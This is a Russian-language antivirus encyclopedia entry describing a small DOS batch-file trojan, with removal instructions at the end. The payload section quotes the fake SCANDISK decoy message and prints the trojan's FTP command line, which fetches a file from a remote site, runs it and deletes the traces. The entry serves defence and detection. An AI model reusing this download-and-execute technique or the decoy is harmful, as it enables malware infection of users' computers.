Родительский класс: TrojWare
Вредоносные программы, которые осуществляют несанкционированные пользователем действия: уничтожают, блокируют, модифицируют или копируют информацию, нарушают работу компьютеров или компьютерных сетей. В отличие от вирусов и червей, представители этой категории не умеют создавать свои копии, не способны к самовоспроизведению.Класс: Trojan
Вредоносная программа, занимающаяся уничтожением, блокированием, модификацией или копированием информации, нарушением работы компьютеров или компьютерных сетей, и при этом не попавшая ни в один из классов троянских программ.Подробнее
Платформа: BAT
No platform descriptionОписание
Technical Details
Троянская программа. Является пакетным файлом DOS.
Размер троянца — около 400 байт.
Payload
При запуске троянской программы появляется окно консоли с сообщением:
MS-DOS SCANDISK
found 27,4951 lost bytes
fixing error(s)...
lost cluster(s) fixed
found 27,4951 lost bytes
fixing error(s)...
lost cluster(s) fixed
Троянец создает файл с именем C:$.tmp, который содержит сценарий работы для утилиты FTP, после чего запускает эту утилиту с параметрами:
ftp -v -i -n -s:c:$.tmp <адрес_сайта для загрузки файла> c:$$.tmp
После этого в папку %WinDir% скачивается файл, имя которого указано в сценарии работы и запускается. После этого троян удаляет файлы:
C:$.tmp
c:$$.tmp
c:$$.tmp
И завершает свою работу.
Removal instructions
- Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
- Удалить скачанный трояном файл
- Произвести полную проверку компьютера Антивирусом Касперского с обновленными антивирусными базами (скачать пробную версию).
Смотрите также
Узнай статистику распространения уязвимостей в своем регионе statistics.securelist.com
Нашли неточность в описании этой уязвимости? Дайте нам знать!